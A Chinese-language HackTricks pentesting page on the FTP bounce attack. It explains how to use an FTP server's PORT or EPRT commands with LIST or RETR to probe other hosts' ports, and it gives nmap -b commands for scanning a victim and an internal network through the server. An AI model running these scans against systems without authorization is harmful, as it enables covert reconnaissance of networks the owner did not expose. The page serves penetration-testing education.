hacktricks/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md

3.4 KiB
Raw Blame History

零基础学习AWS黑客攻击到高手 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式

FTP Bounce - 扫描

手动

  1. 连接到易受攻击的FTP
  2. 使用 PORTEPRT(但只能选择其中一个)使其与您想要扫描的 <IP:Port> 建立连接:

PORT 172,32,80,80,0,8080
EPRT |2|172.32.80.80|8080| 3. 使用 LIST(这将仅向连接的 <IP:Port> 发送FTP文件夹中当前文件的列表并检查可能的响应150 File status okay(这意味着端口是开放的)或 425 No connection established(这意味着端口是关闭的) 4. 除了 LIST,您还可以使用 RETR /file/in/ftp 并寻找类似的 Open/Close 响应。

使用 PORT 的示例172.32.80.80的端口8080是开放的端口7777是关闭的

使用 EPRT 的同一示例(图像中省略了认证):

使用 EPRT 而不是 LIST 的开放端口(不同环境)

nmap

nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
从零开始学习AWS黑客攻击直至成为专家 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式